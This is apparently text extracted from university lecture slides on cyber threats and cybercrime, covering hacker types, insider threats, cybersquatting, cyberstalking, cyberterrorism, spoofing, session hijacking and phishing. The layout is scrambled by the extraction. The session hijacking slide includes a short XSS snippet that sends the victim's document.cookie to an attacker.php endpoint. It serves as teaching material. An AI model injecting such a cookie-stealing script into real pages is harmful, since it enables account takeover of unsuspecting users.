Module 2
Module 2
The slides are used for education purpose. Not support or used for
Amity Institute of Information Technology
Cybersecurity Threats
Cyber Attack
Se
cur
ity
Ter
mi
nol
og
y
CSIT371 Cyber Security and Cyber Laws - Module 2 6
Amity Institute of Information Technology
Motives
• Corporate Espionage, Business Disruption, or Financial Gain.
• Whatever the motivation, cybersecurity threats have become pervasive and
continue to upend every facet of the digital realm.
• Beyond causing severe financial damage, cyberattacks can lead to regulatory
penalties, lawsuits, reputational damage, and business continuity disruptions.
• No business and IT organization are safe in the present cyber world. As
cybercriminals increasingly rely on sophisticated technologies to perform
malicious attacks.
• Rapid adoption of emerging technologies, including AI, the Internet of Things (IoT),
and cloud computing, have added new cyber threats for organizations while adding
“
complexity to existing risks.
According to Verizon’s 2020 Data Breach Investigations Report (DBIR),
86% of cybersecurity breaches were financially motivated, and 10% were
motivated by espionage.
CSIT371 Cyber Security and Cyber Laws - Module 2 8
Amity Institute of Information Technology
Motives
Motives
Target Assets
• Cyber threat actors conduct malicious activity against anything connected to or residing on
the Internet, including devices, information, financial resources, opinions, and reputations:
Informati
Devices
on
Financial
Resource Opinions Reputatio
s ns
Examples of Threats
Threat consequences
Unauthorized Disruption: threat
Deception: threat Usurpation:
disclosure: threat to integrity and
to integrity threat to integrity
to confidentiality availability
• Exposure • Masquerade, • Incapacitation • Misappropriation
(release data), falsification (alter (destruction), (theft of service),
interception, data), corruption misuse (hacker
inference, repudiation (backdoor logic), gaining
intrusion obstruction (infer unauthorized
with access)
communication,
overload a line)
consequences
Threat
E-mail Threats
E-mail Threats
Malicious Zero-Day
Links Attacks
Business
Email
Compromise
Web Threats
• Web threats are malicious activities or vulnerabilities that exploit the internet or web-based
systems to compromise the security, privacy, or functionality of users, organizations, or
systems.
• These threats target websites, web applications, browsers, and users, often leading to data
breaches, financial losses, or reputational damage.
• Common Types of Web Threats: Phishing, Malware, SQL Injection (SQLi), Cross-Site
Scripting (XSS), Cross-Site Request Forgery (CSRF), Man-in-the-Middle (MITM) Attacks, Denial-
of-Service (DoS) and Distributed DoS (DDoS) Attacks, Session Hijacking, Unsecured APIs,
Ransomware via Websites
• Basic components to any web threat:
• Threat motives give an intentional threat agent a reason or goal to cause harm. Some threat
agents don’t act intentionally or act autonomously and may, therefore, be absent of motive.
• Threat agents are anything or anyone that can negatively impact — with the internet either as a
threat vector or a target itself.
• Vulnerabilities include any human behavior weakness, technology systems, or other resources
that can lead to a damaging exploit or incident.
• Threat outcomes are the negative results of a threat agent acting against one or more
vulnerabilities.
CSIT371 Cyber Security and Cyber Laws - Module 2 19
Amity Institute of Information Technology
Hacking
• A hacker can use their skills to explore and improve
technology systems.
• Hackers are often considered "computer criminals" who use
their programming skills to hack or steal information.
• They may use automated programs to compromise a
computer's security system.
• Hackers are typically very knowledgeable about technology
and security.
• Hacking can have a significant impact, such as financial loss
or costly repairs to computer systems.
Types of Hackers
• White Hat Hackers (Ethical Hackers): Work legally and ethically to identify vulnerabilities and help
organizations improve security.
• Example: Penetration testers who simulate attacks to strengthen a system's defenses.
• Black Hat Hackers (Malicious Hackers): Exploit vulnerabilities without permission for personal or
financial gain, or to cause damage.
• Example: Hackers who steal sensitive data to sell on the dark web.
• Grey Hat Hackers: Operate between ethical and unethical boundaries; may exploit vulnerabilities
without malicious intent but without explicit permission.
• Example: Reporting security flaws in a system they accessed without authorization.
• Script Kiddies: Inexperienced individuals who use pre-made tools and scripts to perform hacking
without a deep understanding of the techniques involved.
• Example: Running a DDoS tool downloaded from the internet.
• Hacktivists: Hackers motivated by political, social, or ideological goals, using hacking as a form of
protest or activism.
• Example: Defacing websites to highlight a political issue.
• State-Sponsored Hackers: Operate under government directives to carry out cyber espionage,
sabotage, or attacks against other nations.
• Example: Cyberattacks targeting critical infrastructure of rival countries.
CSIT371 Cyber Security and Cyber Laws - Module 2 23
Amity Institute of Information Technology
Intruders
• An "intruder" is an external attacker who attempts to gain unauthorized access to
a system from outside the organization, typically without legitimate credentials.
• Example: Attempting to breach a company's network by exploiting a vulnerability
in their website.
• Motivations of Intruders: Financial Gain, Espionage, Revenge or Vandalism,
Curiosity or Challenge, Hacktivism, Terrorism.
• Types of Intruders
• External Intruders: Individuals or systems outside the organization who attempt to breach
security barriers. Example: Hackers trying to infiltrate a company's network.
• Internal Intruders: Trusted insiders, such as employees or contractors, who misuse their
access to exploit systems. Example: An employee stealing sensitive customer data.
• Automated Intruders (Bots): Programs or scripts designed to perform unauthorized
actions, such as scanning for vulnerabilities or launching attacks. Example: Botnets
performing Distributed Denial-of-Service (DDoS) attacks.
Intruders (Contd..)
Indicators of Intrusion Preventing Intrusions
• Unusual Network Activity: High traffic from • Implement Strong Authentication: Use multi-
unknown sources or irregular data patterns. factor authentication (MFA) and robust
• Unauthorized Access Attempts: Multiple password policies.
failed login attempts or logins from • Regularly Update and Patch Systems: Keep
unfamiliar locations.
software up-to-date to close security
• Changes in Files or Systems: Unexplained vulnerabilities.
modifications, deletions, or the presence of
unknown files. • Install Security Solutions: Use firewalls,
• System Slowdowns: Reduced performance intrusion detection systems (IDS), and
due to unauthorized processes consuming antivirus software.
resources. • Monitor and Audit: Continuously monitor
• Unexpected Alerts: Warnings from security networks and systems for suspicious
software or logs indicating suspicious activities.
activity.
• Limit Access: Follow the principle of least
privilege by granting users only the access
CSIT371 Cyber Security and Cyber Laws - Module 2 they need. 26
Amity Institute of Information Technology
Insider Threats
An insider threat is a security risk that comes from someone within an organization who has
access to sensitive information or privileged accounts and misuses it. Insider threats can be
intentional or unintentional, and can come from a variety of people, including current or former
employees, contractors, vendors, and interns
Insider Threats
Difficult to Detect
• Insider threats are difficult to detect because traditional
security measures are often ineffective against them.
Some signs of an insider threat include:
• Unusual access times, such as signing into the network at odd
hours
• Unusual spikes in network traffic
• Accessing resources that are not relevant to their job function
• Using unauthorized devices, such as USB drives
• Emailing sensitive information outside the organization
• Excessive spikes in data downloads
• Using tools like Airdrop to transfer files
CSIT371 Cyber Security and Cyber Laws - Module 2 29
Amity Institute of Information Technology
Impact: Data Impact: Leak Impact: Massive Impact: Triple data Impact: Code
Impact: Intellectual Impact: Data theft
exposure customer data data breach breach repositories stolen
property theft
Popular Examples
Cyber Squatting
• Cybersquatting refers to the act of registering or using a
domain name to profit from a trademark, corporate
name, or personal name of an individual. Types of Cyber
Squatting
Reverse
Cyber
Squatting
Typosquattin
Identit g
y
Name
theft
jackin
g
CSIT371 Cyber Security and Cyber Laws - Module 2 31
Amity Institute of Information Technology
An attacker assuming the online persona of a legitimate business by registering a domain that
Identity looks identical to the targets. Users trying to reach the company's site via the web can
accidentally access the phishing domain. Domain squatting involving identity theft also occurs
theft when a hacker acquires a previously registered domain whose owner has let the registration
lapse.
Name It occurs when a squatter creates a false website using the real name of a famous person. This
is frequently the situation when, for example, domains or, more maliciously, social media profiles
jacking are registered in the names of celebrities by cybersquatters. It may not always be possible to
prove that name jacking was done on purpose, making prosecution of the crime challenging.
Reverse domain name hijacking (RDNH), also known as reverse cybersquatting, is a technique that is,
Reverse in some ways, the opposite of cybersquatting. While purchasing a domain name that contains a
trademark with the goal of making money off that trademark is cybersquatting, reverse domain
Cyber hijacking is a little different. It happens when a person or business makes a false claim that she, he, or
Squatting it owns a trademark and then takes unjustified steps to take your legitimate domain name away.
CSIT371 Cyber Security and Cyber Laws - Module 2 32
Amity Institute of Information Technology
Cyber Stalking
• Cyberstalking refers to the use of the internet, social media, email, or other
digital technologies to harass, threaten, or intimidate an individual.
• Unlike traditional stalking, which involves physical proximity, cyberstalking
is carried out online, making it easier for perpetrators to target victims
anonymously and from a distance.
• Key Characteristics of Cyberstalking
• Persistent and Repeated Behavior: The stalker repeatedly contacts or monitors
the victim despite being asked to stop.
• Harassment or Threats: Messages or actions that create fear, distress, or
discomfort for the victim.
• Use of Digital Platforms: Involves emails, text messages, social media, forums, or
even hacking into personal accounts.
• Anonymity: Cyberstalkers often hide their identity, making it difficult to trace them.
Cyberstalking
Common
Tactics Used in Cyberstalking Impacts of Cyberstalking
• Unwanted Communication: Sending • Emotional and Psychological Distress: Anxiety,
excessive emails, messages, or texts to the depression, fear, and loss of a sense of safety.
victim. • Social Isolation: Victims may avoid social
• Social Media Surveillance: Constantly media or online platforms to escape
monitoring the victim’s online activities, harassment.
posts, and interactions. • Reputational Damage: False information or
• Impersonation: Creating fake profiles to impersonation can harm the victim's personal
interact with the victim or damage their or professional reputation.
reputation. • Physical Threats: Cyberstalking can escalate
• Doxxing: Publicly revealing the victim’s to physical stalking or violence in extreme
personal information, such as their address cases.
or phone number. • Financial Loss: Victims may incur costs to
• Threats and Intimidation: Sending messages
enhance digital security or recover from
or posts that threaten harm to the victim or
hacking incidents.
their loved ones.
• Hacking and Spying: Gaining unauthorized
CSIT371 Cyber Security and Cyber Laws - Module 2 35
Amity Institute of Information Technology
Crime of Deception
• Deception is a legal concept that refers to the act of intentionally misleading
someone to gain an unfair advantage or cause harm. It can be a criminal offense or
grounds for legal action in contract law.
• In criminal law, deception can include:
• Obtaining property by deception
• Obtaining a money transfer by deception
• Obtaining pecuniary advantage by deception
• Procuring the execution of a valuable security by deception
• Obtaining services by deception
• Evasion of liability by deception
• In contract law, deception is known as misrepresentation or fraudulent
misrepresentation.
• In India, Section 415 of the Code of India states that anyone who fraudulently or
dishonestly deceives a person to deliver property or consent to the retention of
property is guilty of a crime.
CSIT371 Cyber Security and Cyber Laws - Module 2 37
Amity Institute of Information Technology
Types of COC
Cyberbullying Child
Cyber Fake News and
Hate Speech and Exploitation
Defamation Misinformation
Harassment Material
• Publishing • Sharing • Using online • Creation, • Disseminating
false or content that platforms to distribution, or false or
defamatory incites intimidate, possession of misleading
statements violence, threaten, or content information to
online to harm discrimination, humiliate involving the manipulate
an individual's or hostility individuals. exploitation of public opinion
or against • Example: minors. or cause
organization's specific Sending • Example: harm.
reputation. groups based abusive Hosting or • Example:
• Example: on race, messages or sharing illegal Spreading
Posting false religion, sharing content on unverified
allegations on ethnicity, embarrassing file-sharing health-related
social media gender, etc. photos without platforms. claims during
about a public • Example: Viral consent. a pandemic.
figure. posts
promoting
xenophobia.
CSIT371 Cyber Security and Cyber Laws - Module 2 40
Amity Institute of Information Technology
Types of COC
Online Gaming
Intellectual Online Scams and
Revenge Porn and Forum
Property Theft Radicalization Fraud
Abuse
• Unauthorized • Distributing • Sharing • Deceptive • Using online
use, extremist explicit content aimed gaming
reproduction, propaganda to images or at tricking platforms or
or distribution recruit videos of individuals forums to
of copyrighted individuals someone into financial spread toxic,
material. into terrorist without their loss. illegal, or
• Example: organizations. consent to • Example: Fake harmful
Pirated • Example: harm their investment content.
movies, Using reputation or schemes • Example:
software, or encrypted privacy. advertised Sharing links
books messaging • Example: through to illicit
uploaded to apps to Uploading fraudulent material in
torrent circulate private photos websites. gaming chats.
websites. ideological to social
content. media or adult
websites.
Impacts of COC
Economic Legal and Technological
Social Impact:
Impact: Ethical Impact: Impact:
• Erosion of • Losses from • Strain on law • Increased
trust in online scams, fraud, enforcement demand for AI-
platforms. and agencies to driven content
• Psychological intellectual track and moderation
trauma for property theft. prosecute tools.
victims. • Financial offenders. • Emergence of
• Polarization burden on • Ethical counter-
and societal companies to dilemmas technologies
division address about like deepfake
through hate cybersecurity censorship detection.
speech and and content and freedom
fake news. moderation. of speech.
Balancing Freedom
Evolving
and Security:
Technologies:
Governments must
Sophisticated tools like
balance the need for
deepfakes make it
content regulation with
harder to identify
protecting freedom of
manipulated content.
expression.
Content-oriented online crime represents a significant challenge in the digital era, affecting individuals, organizations, and
societies. Effective countermeasures require a combination of technological innovation, robust legislation, and public
awareness, all while maintaining a balance between security and freedom of expression.
CSIT371 Cyber Security and Cyber Laws - Module 2 44
Amity Institute of Information Technology
Cyber Terrorism
• Cyberterrorism is the use of the Internet to conduct violent acts that result in, or
threaten, the loss of life or significant bodily harm, in order to achieve political
or ideological gains through threat or intimidation.
• Emerging alongside the development of information technology, cyberterrorism
involves acts of deliberate, large-scale disruption of computer networks,
especially of personal computers attached to the Internet by means of tools
such as computer viruses, computer worms, phishing, malicious software,
hardware methods, and programming scripts can all be forms of internet
terrorism.
• Cyberterrorism can be also defined as the intentional use of computers,
networks, and public internet to cause destruction and harm for personal
objectives.
• Experienced cyberterrorists, who are very skilled in terms of hacking can cause massive
damage to government systems and might leave a country in fear of further attacks.
• The objectives of such terrorists may be political or ideological since this can be
considered a form of terror.
CSIT371 Cyber Security and Cyber Laws - Module 2 46
Amity Institute of Information Technology
Cyber Terrorism
Characteristics of Cyber Terrorism Key Objectives
1.Digital Nature: Cyber terrorism operates • Disruption: Paralyzing critical
in the virtual domain, targeting computer infrastructures such as power grids, financial
systems, networks, and information. systems, healthcare, transportation, and
2.Anonymity: Attackers often operate communication networks.
anonymously, making it challenging to • Psychological Impact: Instilling fear and
attribute the attacks to specific uncertainty among populations.
individuals or groups. • Espionage: Stealing sensitive information to
3.Low Cost and High Impact: Cyber undermine national security or gain a
attacks are relatively inexpensive to strategic advantage.
execute but can cause significant • Economic Damage: Causing financial loss
disruption and economic loss. through attacks like ransomware or denial-of-
4.Global Reach: Cyber terrorism service (DoS) operations.
transcends geographic boundaries, • Propaganda: Spreading extremist ideologies
affecting victims worldwide. and recruiting members via online platforms.
Cyber Terrorism
Examples of Cyber Terrorism Challenges in Countering Cyber
1.Stuxnet (2010): A sophisticated Terrorism
malware allegedly developed to disrupt 1.Attribution: Difficulty in identifying
Iran's nuclear program by targeting its perpetrators due to anonymizing
industrial control systems.
technologies.
2.WannaCry Ransomware Attack
(2017): A global ransomware attack that 2.Jurisdictional Issues: Cyber crimes
crippled businesses, hospitals, and often cross national boundaries,
government services. complicating enforcement.
3.Power Grid Attacks: Cyber terrorists 3.Technological Sophistication:
have targeted power grids in Ukraine Rapid evolution of cyber attack
(2015), leading to widespread blackouts. techniques outpaces defensive
4.Cyber Espionage: Persistent threats capabilities.
from state-backed or independent groups
targeting sensitive government data. 4.Lack of Awareness: Limited public
understanding of cyber security risks.
CSIT371 Cyber Security and Cyber Laws - Module 2 48
Amity Institute of Information Technology
Cyber Terrorism
Impact of Cyber Terrorism Preventive Measures
• Economic Loss: Billions of dollars lost 1.Strengthening Cybersecurity
annually due to data breaches, Infrastructure: Robust firewalls,
ransomware payments, and recovery intrusion detection systems, and
encryption protocols.
costs.
2.International Cooperation: Cross-
• National Security: Threats to defense, border collaboration to address the global
intelligence, and critical infrastructures. nature of cyber threats.
• Social Chaos: Disruption of essential 3.Public Awareness Campaigns:
services like healthcare, banking, and Educating users about safe online
transportation. practices and the risks of cyber terrorism.
• Psychological Fear: Public fear and 4.Legislative Frameworks: Enacting and
loss of trust in digital systems. enforcing laws against cyber terrorism.
5.Incident Response Teams: Establishing
rapid response mechanisms to mitigate
CSIT371 Cyber Security and Cyber Laws - Module 2 attacks. 49
Amity Institute of Information Technology
Psychological Electronic Warfare Cyber Warfare: Disinformation and Command and Control
Operations (PsyOps): (EW): Employing cyber tools to Misinformation: Warfare (C2W):
Disseminating Using electromagnetic attack an adversary's Spreading false or Targeting decision-
information to influence spectrum operations to information systems, misleading information to making structures to
the emotions, motives, or disrupt or degrade steal sensitive data, or confuse or mislead paralyze an enemy's
reasoning of target enemy communication disrupt operations. opponents. ability to act effectively.
audiences. and radar systems. Example: Hacking into Example: Fake news Example: Disrupting
Example: Propaganda Example: Jamming military databases to campaigns during enemy communication
campaigns to demoralize enemy communication gather intelligence. elections to sway public networks.
enemy forces. signals during combat. opinion.
Surveillance
• Surveillance involves the systematic monitoring of individuals, groups, or
systems to collect information for security, intelligence, or strategic purposes. It
is a key component of intelligence gathering in both military and civilian
contexts.
• Purpose of Surveillance
• Prevent terrorist activities.
• Ensure national security.
• Monitor dissent or political movements.
• Enforce law and order.
• Track and counter cyber crimes.
• Challenges and Ethical Concerns
• Privacy Invasion: Mass surveillance often leads to concerns about individual freedoms and
privacy.
• Data Security: Collected data can be vulnerable to breaches.
• Abuse of Power: Surveillance tools can be misused by authoritarian regimes to suppress
dissent.
CSIT371 Cyber Security and Cyber Laws - Module 2 52
•
Amity Institute of Information Technology
Types of Surveillance
Electronic Surveillance: Video Surveillance: Mass Data Collection: Signals Intelligence Human
Monitoring digital Using CCTV cameras or drones Aggregating and analyzing large (SIGINT): Intelligence
communications, including to observe physical spaces. volumes of data from social Intercepting communications (HUMINT):
emails, phone calls, and Example: Smart cities employing media, financial transactions, or and electronic signals for Relying on
internet activity. camera networks for public location tracking. intelligence purposes. informants or
Example: Governments using safety. Example: Social media Example: Monitoring enemy
undercover agents to
wiretapping to track criminal monitoring during protests. radio communications in
activities. wartime.
gather information.
Example: Espionage
activities.
In modern conflicts, Information Warfare and Surveillance are closely linked. Surveillance provides the intelligence
needed to plan and execute Information Warfare strategies, while Information Warfare creates conditions that justify
enhanced surveillance. Together, they form a feedback loop in which each strengthens the other.
Virtual Crime
• Virtual crime, also known as cybercrime, is illegal
activity that takes place on the internet. Some examples
of virtual crimes include
• Identity theft
• Cyber stalking
• Ransomware
• Phishing
• Malware
• Intellectual property crimes
Online Frauds
• It refers to fraudulent activities committed
through the internet, where criminals use
deceptive tactics to steal personal information,
money, or access to sensitive data from
victims, often through phishing emails, fake
websites, or malicious software, with common
types including identity theft, credit card fraud,
and business email compromise (BEC). Common
• Online frauds Methods: targets:
• Phishing: Sending deceptive emails or messages that
appear to be from a trusted source, tricking users into
revealing sensitive details like login credentials or credit Online
Credit card
card numbers. banking
details
accounts
• Malware: Installing malicious software on a victim's
device to steal information or disrupt system functionality.
• Social engineering: Manipulating people into divulging
confidential information through psychological tactics. Personal
Social identificati
• Spoofing: Creating fake websites or emails that closely media on
resemble legitimate ones to deceive users. accounts informatio
• Data breaches: Gaining unauthorized access to a n (PII)
database containing sensitive personal data.
https://www.thehindu.com/data/
cyber-fraud-in-banking-
CSIT371 Cyber Security and Cyber Laws - Module 2 transactions-surges-in-fy24-data/ 55
Amity Institute of Information Technology
Mapping the global geography of
cybercrime with the World
Cybercrime Index
Network Theft
• Worms
• Virus
• Spam’s
• Ad-ware
• Spy ware
• Trojans
Spoofing
Spoofing is a cybercrime where a malicious actor impersonates a trusted
entity to gain access to sensitive information. The goal is to exploit trust
and manipulate victims into taking actions that compromise their security.
• IP Spoofing: IP Spoofing is pretending to be someone else. This is a
technique used to gain unauthorized access to the computer with an IP
address of a trusted host. In implementing this technique, attacker has
to obtain the IP address of the client and inject his own packets spoofed
with the IP address of client into the TCP session, so as to fool the server
that it is communicating with the victim i.e. the original host.
• Address Resolution Protocol (ARP) spoofing: An attacker links their MAC
to a legitimate network IP address so they can receive data meant for
the owner of that IP address.
Session Hijacking
• Session hijacking is a cyberattack where an attacker
gains access to a user's online session. This allows the
attacker to impersonate the user and access their data
and actions.
• How it works
• The server assigns a session ID to a user when they log in.
• The attacker steals the session ID, which is usually stored in
cookies, URLs, or hidden form fields.
• The attacker uses the session ID to impersonate the user and
access their data.
Session Hijacking
• Methods used • Consequences
• Packet sniffing: Intercepting • Identity theft, Financial theft,
network traffic to capture session Malware infection, Denial-of-
IDs Service (DoS) attacks, and
• Cross-site scripting (XSS): Injecting Violations of data protection
malicious scripts into web pages to regulations.
steal session IDs
• Malware: Using malware to infect a • How to prevent it ?
user's device and extract session • Use HTTPS and HSTS, Implement
information strong session management,
• Brute force: Trying session IDs until Enable HTTP-only and secure
they are successful flags on cookies, Implement
• Calculation: Calculating session multifactor authentication (MFA),
IDs if they are generated in a non- and Educate users about the risks
random manner of public Wi-Fi.
Session Hijacking
• TCP session hijacking is a security attack on a user session over a
protected network. The most common method of session
hijacking is called IP spoofing, when an attacker uses source-
routed IP packets to insert commands into an active
communication between two nodes on a network and disguise
itself as one of the authenticated users. This type of attack is
possible because authentication typically is only done at the start
of a TCP session.
• Another type of session hijacking is known as a man-in-the-
middle attack, where the attacker, using a sniffer, can observe
the communication between devices and collect the data that is
transmitted.
CSIT371 Cyber Security and Cyber Laws - Module 2 68
Amity Institute of Information Technology
Session Hijacking
• Different ways of
session hijacking :
• Using Packet Sniffers: In
the given figure, it can be
seen that attack captures Session 1
the victim’s session ID to
gain access to the server
by using some packet
sniffers.
Session 2
CSIT371 Cyber Security and Cyber Laws - Module 2 69
Amity Institute of Information Technology
Session Hijacking
• Cross Site Scripting(XSS <SCRIPT type="text/javascript">
Attack) var adr = '../attacker.php?victim_cookie=' +
escape(document.cookie);
Attacker can also capture </SCRIPT>
Sabotage
• Cyber sabotage is the intentional disruption of an organization's
computer systems or data to hinder its operations. It can also
involve damaging an organization's physical infrastructure.
• Examples of cyber sabotage
• Deleting code: Intentionally removing code to prevent an organization from operating
normally
• Infecing a website: Using malware to damage a website's information
• Interfering with computer systems: Altering, erasing, or suppressing computer data or
programs
• Ransomware attacks: Using ransomware to disrupt an organization's operations
• Who commits cyber sabotage?
• Saboteurs: People who intentionally damage an organization's systems or data
• Insiders: Employees who sabotage an organization's systems or data
CSIT371 Cyber Security and Cyber Laws - Module 2 71
Amity Institute of Information Technology
Phishing
• How phishing works • How to protect yourself from
• Attackers masquerade as a phishing
reputable entity or person • Be skeptical of emails that
threaten negative consequences
• Attackers use personalized • Be wary of unusual requests
messaging, especially
emails, to trick victims
• Attackers often use threats
or a sense of urgency
• Attackers often use unusual
requests
Zombie/Zombie Drone
• "zombie" or "zombie drone" refers to a compromised computer that has been infected with
malware, allowing a hacker to remotely control it and use it to perform malicious actions without
the owner's knowledge, essentially turning it into a mindless "drone" carrying out the hacker's
commands, often as part of a larger botnet.